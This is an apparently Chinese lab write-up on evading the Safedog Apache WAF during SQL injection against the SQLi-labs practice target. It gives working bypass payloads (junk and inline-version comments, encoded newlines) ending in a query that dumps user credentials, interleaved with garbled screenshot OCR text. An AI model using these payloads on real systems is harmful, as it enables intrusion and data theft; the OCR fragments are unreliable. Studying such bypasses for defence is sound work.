SQL注入 安全狗apache3.5.12048版本绕过(下)

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
简介: SQL注入 安全狗apache3.5.12048版本绕过

2. 测试and


直接使用and的时候,没有异常,但是使用and 1=1的时候,出现问题


正常

image.png

Welcome

Dhakkan

YANDARERGMYUS款mm心YMoe

曝样式编辑器

存储

口查吞器

网络

调试器

无障碍环境

性第

应用程序

内存

四控制台

AdblockPlus

HackTools

HackBar

Contributenow!

XSS

SQL

Other

Encoding

ncryption'

http://10.211.55.9/ess-/id-

LoADURL

and

--+

SplitURl



拦截


image.png

m

目口

10.211.55.9/Less-1/qid-1%20and%201%20

转到下一页

下拉显示历史

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

内存日存储可无障碍环境

应用程序

性能

查看器

控制台调试器杯网络样式编辑器

AdblockPlus

HackBar

xSSOther

Encoding

Encryption

SQL

http://10.211.55.9/Less-/id-d

LoadURL

SplitURL

这里测试发现  and 可以出现,但是1不可以出现,既然无法绕过,这里尝试使用注释符来进行测试


3. 测试注释符


在这随机手写了一个,然后就过了。。。。


/*@%$^(*/

http://10.211.55.9/Less-1/?id=1'  and/*@%$^(*/ 1=1 --+

image.png

Dhakkan

Welcome

YourLogin

inname:Dumb

YourPassword:Dumb

日存储

一无障碍环境

样式编辑器

网络

口查看器

控制台

性能

应用程序

0内存

调试器

HackTools

AdblockPlus

HackBar

Encryption

XSS

Other

Encoding

SQL

LoadURL

http://10.211.55.9Le/%/

SplitURL

image.png

Dhakkan

Welcome

YourLogin

inname:Dumb

YourPassword:Dumb

日存储

一无障碍环境

样式编辑器

网络

口查看器

控制台

性能

应用程序

0内存

调试器

HackTools

AdblockPlus

HackBar

Encryption

XSS

Other

Encoding

SQL

LoadURL

http://10.211.55.9Le/%/

SplitURL

image.png

Dhakkan

Welcome

YourLogin

inname:Dumb

YourPassword:Dumb

日存储

一无障碍环境

样式编辑器

网络

口查看器

控制台

性能

应用程序

0内存

调试器

HackTools

AdblockPlus

HackBar

Encryption

XSS

Other

Encoding

SQL

LoadURL

http://10.211.55.9Le/%/

SplitURL


继续:


使用order by指令


http://10.211.55.9/Less-1/?id=1'  order by 4 --+




这里可以测出来一共存在三列,然后使用联合查询来试试


http://10.211.55.9/Less-1/?id=1'  union select 1,2,3 --+

image.png

10.211.55.9/Less-1/id1%2uonelc12

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截

可能原因:您提交的内容包含危险的攻击请求

如何解决:

日存储

调试器此网络样式编辑器

内存

应用程序

查看器

无障碍环境

性能

控制台

AdblockPlus

HacKTo

HackBar

EncodingsQLXSSOther

Encryption

LoadURL

http://10.211.55.9/Less-/iinselc2

SplitURL

image.png

10.211.55.9/Less-1/id1%2uonelc12

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截

可能原因:您提交的内容包含危险的攻击请求

如何解决:

日存储

调试器此网络样式编辑器

内存

应用程序

查看器

无障碍环境

性能

控制台

AdblockPlus

HacKTo

HackBar

EncodingsQLXSSOther

Encryption

LoadURL

http://10.211.55.9/Less-/iinselc2

SplitURL



如果只有union呢?试试


http://10.211.55.9/Less-1/?id=1'  union  --+ 正常



image.png

WelcomeDhakkan

YAMeAEAAIUS0XLOMDCORMDBOUMSALBOYBUULAOMAOUGTUALUIG

中查看器

此网络

日存储

调试器

样式编辑器

控制台

AdblockPlus器应用程序

性能

内存

无障碍环境

HackBar

HackTools

Encryption

SQL

xsszOther

Encoding

Cont

LOaDURL

http://10.211.55.9/Less-1/id1union

SplitURL


select呢

http://10.211.55.9/Less-1/?id=1'  union  select --+

gg

image.png

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

茶中

日存储

]样式编辑器

摆你网络

调试器

应用程序

查看器

控制台

无障碍环境

性能

0内存

HackTools

ABPAdblockPlus

HackBar

Encryption

Encoding

Other

XSS

SQL

LoADURL

http://10.211.55.9/Less-/id-1

1unionselect-+

SpltURL

Execute

PostdataORefererOUserAgentoCookies

ClearAll


使用刚刚的注释符试试

http://10.211.55.9/Less-1/?id=1'  union /*@%$^(*/ select --+正常

image.png

Dhakkan

Welcome

UbeyanGrgYu50mbomeombooma

ne/9_9

内存

日存储

样式编辑器

照应用程序

无障碍环境

介网络

查看器

性能

调试器

控制台

AdblockPlus

HackTools

HackBar

XSS

Encryption

SQL

Other

Encoding

http://10.211.55.9/Less-/iduion/@%$/select

LOadURL

继续

http://10.211.55.9/Less-1/?id=1'  union /*@%$^(*/ select 1,2,3 --+显示正常

image.png

WelcomeDhakkan

YourLoginname:Dumb

YourPassword:Dumb

日存储

查看器

0内存

性能

无障碍环境

调试器

控制台

仪网络

样式编辑器

应用程序

AdblockPlus

HackBar

Encryption

SQL

XSS

Other

Encoding

http:/10.211.55.9Leio%/l2

LoadURL

SnlitURl


继续:

http://10.211.55.9/Less-1/?id=-1'  union /*@%$^(*/ select 1,2,3 --+

正常

image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:3

日存储

[样式编辑器

0内存

此网络

控制台

性能

调试器

查看器

无障碍环境

AdblockPlus

HackBar

ABP

Encoding

Encryption

XSS

SQL

Other

http://10.211.55.9/i2

LoadURL

SplitURL


那就可以来获得数据了

http://10.211.55.9/Less-1/?id=-1'  union /*@%$^(*/ select 1,2, database() --+


错误


image.png

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

控制台

此网络

D调试器

性能刀内存

无障碍环境

查看器

样式编辑器

应用程序

AdblockPlus

存储

HackTools

HackBar

Encryption

XSS

SQL

Other

Encoding

LoaDURL

http://10.211.55.9Le-io%l.a

SplitURL


看来database()被过滤,那这里面对其进行绕过


4. 测试database()


在这里经过多次测试之后发现,database()可以使用database/**/()进行绕过

image.png

database/**

se1ect

mySq1

database

security

1

0.00

sec

in

set

row

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2, database/**/() --+

显示正常


image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:security

看器

日存储

无障碍环境

此网络

0内存

样式编辑器

调试器

性能

控制台

HackBar

AdblockPlus

Encoding

XSS

SQL

Other

n

http://10.211.559e-/dl

URL

URL


此时已经获得了数据库名称为security

继续操作来进行下一步,直到能够获取所有的关键信息

现在已知数据库之后,开始获取数据库中的表信息:

对第三个位置来获取表信息:

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,或者是:http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的

试试:


http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1 --+

情理之中,开始准备fuzz

image.png

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

检查提交内容;

2)如网站托管,请联系空间提供商;

3)普通网站访客,请联系网站管理员;

中查若器口控制台D调试器刊网络样式编据器性能0内存

日存储

一无障碍环境

暖应用程序

0p

HackTools

AdblockPlus

HackBar

Other

ryptionEncodingSQLXSS

地和选

LoadURL

SplitURL

Execute


http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name     --+


正常

image.png

Dhakkan

Welcome

Unknowncolumn'tablename'in'fieldlist

SQLIDUMBSERO

日存储

D调试器

日控制台

中查看器

样式编辑器

0内存

无障碍环境

性能

杯网络

应用程序

AdblockPlus

HackTools

HackBar

SQL

XSS

Encoding

Other

cryption

LOaDURL

http:/10.211.55.9L-%slt2la

--+


http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name   from  --+

此时显示异常


image.png

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原:您提交的内容包含危险的攻击请求

如何解决:

1)检查提交内容;

2)如网站托管,请联系空间提供商;

3)普通网站访客,请联系网站管理员;

日存储

无障碍环境

霸应用程序

门样式编辑器

0内存

性能

调试器

查君器

日控制台

网络

AdblockPlus

HackTools

HackBar

Other一

XSS

SQL

Encoding

ncryption

LOaDURL

htp//io.211.5592lm

SplitURL


经过fuzz发现,from是关键字,table_name   并不是关键字,所以需要对from进行绕过

经过多次多组fuzz发现,这里需要使用chr()来进行绕过

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   CHAR(102, 114, 111, 109)   --+

成功

image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:from

SOLIDUMBSHRO

贝性能

样式编辑器

你网络

日存储

D调试器

无障碍环境

0内存

应用程序

制台

HackTools

HackBar

AdblockPlus

xssOther

SQL

oding

http://10.211.55.9/Less-/?id

1union/@%S/select1.2CHA(102141)

--+

但是在这里是没法继续下去的


内联注释知识点

  • /*!select*/:  相当于没有注释
  • /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。
  • /*![]*/: []中括号中的数字若填写则必须是5位

mvsqiselect*51000version

54(42000:Youhaveanerror

ERROR1064

SQL

syntax;checkthe

that

in

manual

your

fortherightsyntaxtousen

at

correspondstoyourMySQLseryerersion

enear

iine1

mysqi>select*!41000versionO)*;

version

5,5.53

rowinset(0.00sec

mySq1>select*!49000versionO*;

version(

5,5.53


http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(schema_name)  /*!00000%23/*%0afrom */ information_schema.schemata   --+


image.png

Welcome

Dhakkan

YourLoginname:2

YourPasswordinfomionchmangesmspomaem

SQLIDUMDBSERODBS-

熊:应用程序

日存储

0内存

此网络

性能

AdblockPlus

调试器

控制台

无障碍环境

样式编锗器

查吞器

HackBar

HackTools

ContributenowlHackBarv

XSS

SQL

Encoding

yption

Other

啦如地心他

OADURL

/920information_schema.schemata%20%20%20--+

plitURL

Execute

PostdataORefereroUserAgentCcookies

ClearAIl


fuzz成功

这里使用

/*!%23/*%0afrom*/

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(table_name)  /*!%23/*%0afrom*/ information_schema.tables where table_schema='security' --+

image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:emails,referers,u,

SQLIDUMBSBROES

吕存储

熊应用程序

样式编辑器

控制台

查看器

O内存

性能

网络

调试器

无障碍环境

AdblockPlus

HackBar

HackTools

Encryption-

Encoding

SQL

XSS

Contributenow!Hao

Other

LoaDURL

脚地

SpltURL

Execute


http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(column_name)  /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+


image.png

Welcome_Dhakkan

YourLoqinname:2

YourPassword:id,username,password

SQLIDUMBSHROES

中查看器

露应用程序

调试器

此网络

0内存

日存储

无障碍环境

性能

伊样式瑜辑器

AdblockPlus

控制台

HackBar

HackTodls

XSS

SQL

Other

ContributenowlHackBarv

encryption

Encoding

千叫@m

LOaDURL

http://10.211.55.9/Less-/2id

SplNtURL

Execute

OPostdata

ClearAII

Cookies

Referer

UserAgent

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2,group_concat(concat_ws(0x7e, username, password))  /*!%23/*%0afrom*/ security.users --+

image.png

Dhakkan

welcome

YourLoginname:2

YourPassword:Dumb~Dumb,Angelina-ill-

UDCmYPgGd%YPmmm

SQLIDUMBSEROSS

日存储

门样式编器性能

O内存

可无障碍环境

口控制台

盟应用程序

词试器

查右器

网络

AdblockPlus

HackBar

HackTools

ContributenowlHackBarv2

XSS

SQL

Other

Encoding

Encryptlon

LoaDURL

地却取年叫1

SpltURL

M.

Execute

UserAgentOCookies

Postdata

ClearAIl

Reterer

image.png

Dhakkan

welcome

YourLoginname:2

YourPassword:Dumb~Dumb,Angelina-ill-

UDCmYPgGd%YPmmm

SQLIDUMBSEROSS

日存储

门样式编器性能

O内存

可无障碍环境

口控制台

盟应用程序

词试器

查右器

网络

AdblockPlus

HackBar

HackTools

ContributenowlHackBarv2

XSS

SQL

Other

Encoding

Encryptlon

LoaDURL

地却取年叫1

SpltURL

M.

Execute

UserAgentOCookies

Postdata

ClearAIl

Reterer

image.png

Dhakkan

welcome

YourLoginname:2

YourPassword:Dumb~Dumb,Angelina-ill-

UDCmYPgGd%YPmmm

SQLIDUMBSEROSS

日存储

门样式编器性能

O内存

可无障碍环境

口控制台

盟应用程序

词试器

查右器

网络

AdblockPlus

HackBar

HackTools

ContributenowlHackBarv2

XSS

SQL

Other

Encoding

Encryptlon

LoaDURL

地却取年叫1

SpltURL

M.

Execute

UserAgentOCookies

Postdata

ClearAIl

Reterer

tamper编写


后面出视频

相关文章
|
1月前
|
SQL 存储 Apache
Apache Doris 3.0.3 版本正式发布
亲爱的社区小伙伴们,Apache Doris 3.0.3 版本已于 2024 年 12 月 02 日正式发布。该版本进一步提升了系统的性能及稳定性,欢迎大家下载体验。
|
2月前
|
Dubbo 安全 应用服务中间件
Apache Dubbo 正式发布 HTTP/3 版本 RPC 协议,弱网效率提升 6 倍
在 Apache Dubbo 3.3.0 版本之后,官方推出了全新升级的 Triple X 协议,全面支持 HTTP/1、HTTP/2 和 HTTP/3 协议。本文将围绕 Triple 协议对 HTTP/3 的支持进行详细阐述,包括其设计目标、实际应用案例、性能测试结果以及源码架构分析等内容。
|
3月前
|
前端开发 Java API
Apache Seata(incubating) 首个版本重磅发布!
2.1.0 是 Seata 进入 Apache 基金会的第一个 Release Version。此次发布将 io.seata 包名更改为 org.apache.seata。除了按原有的 Roadmap 技术演进外,2.1.0 进行了大量兼容性工作,实现了 API、数据和协议的兼容。用户无需修改原有的 API 和配置,即可实现到 Apache 版本的平滑升级。
132 18
Apache Seata(incubating) 首个版本重磅发布!
|
2月前
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
67 2
|
2月前
|
SQL 存储 Java
Apache Doris 2.1.7 版本正式发布
亲爱的社区小伙伴们,**Apache Doris 2.1.7 版本已于 2024 年 11 月 10 日正式发布。**2.1.7 版本持续升级改进,同时在湖仓一体、异步物化视图、半结构化数据管理、查询优化器、执行引擎、存储管理、以及权限管理等方面完成了若干修复。欢迎大家下载使用。
|
3月前
|
SQL 监控 测试技术
SQL现在到哪个版本及版本更新技巧与方法
SQL(Structured Query Language)作为数据库管理和操作的标准语言,随着技术的不断进步和数据库管理系统(DBMS)的持续发展,其版本也在不断更新和完善
|
3月前
|
存储 SQL 缓存
Apache Doris 3.0 里程碑版本|存算分离架构升级、湖仓一体再进化
从 3.0 系列版本开始,Apache Doris 开始支持存算分离模式,用户可以在集群部署时选择采用存算一体模式或存算分离模式。基于云原生存算分离的架构,用户可以通过多计算集群实现查询负载间的物理隔离以及读写负载隔离,并借助对象存储或 HDFS 等低成本的共享存储系统来大幅降低存储成本。
Apache Doris 3.0 里程碑版本|存算分离架构升级、湖仓一体再进化
|
3月前
|
SQL Oracle 关系型数据库
SQL数据库当前版本概览与更新趋势
在探讨SQL(Structured Query Language)数据库的当前版本时,我们首先要明确的是,SQL本身是一种查询语言标准,而并非特指某一个具体的数据库产品
|
2月前
|
SQL 关系型数据库 MySQL
MySql5.6版本开启慢SQL功能-本次采用永久生效方式
MySql5.6版本开启慢SQL功能-本次采用永久生效方式
48 0
|
4月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
151 5

推荐镜像

更多